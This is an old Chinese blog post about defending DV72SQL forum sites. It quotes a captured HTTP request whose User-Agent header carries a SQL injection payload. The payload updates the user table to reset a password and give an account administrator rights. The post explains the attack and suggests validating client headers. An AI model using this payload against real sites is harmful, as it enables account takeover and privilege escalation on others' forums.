CSDN博客

img 3cts

DV72SQL的防被黑心得

发表于2004/10/27 12:05:00  2114人阅读

分类: 安全资讯 Web编程 Web技术

近日,有朋友说自己的论坛频频被黑,服务器没有任何的上传组件,已经关闭了FSO.但照样被黑.

也就分析这有可能是DV72SQL版本自身的问题.

据N长时间的较量,朋友得到所谓的攻击方式,其实也无非是借助了桂林老兵写的一个DV72SQL的BUG的利用工具.

提交的数据包内容-----------------

GET /bbs/showerr.asp?BoardID=1&action=OtherErr HTTP/1.1
Referer: http://www.target.com/bbs/showerr.asp?BoardID=1&action=OtherErr
User-Agent: Mozilla/4.0 (compatible;M;M;M;','论坛首页',7,'',2) update Dv_User set UserPassword='4621d373cade4e83',UserGroupID=1 where username='桂林老兵'--Netscape
Host: www.target.com
Cookie:

这些就是即将要攻击的数据.

其实这种东西.只要我们加此检测User-Agent的过程就可以了.
至于如何去写这些代码,相信大家都心中有数了吧?

以后我们在程序的防黑上一定要做足一点.
最好再对提交数据的客户端的环境参数要进行严格的控制.

阅读全文
0 0

相关文章推荐

img
取 消
img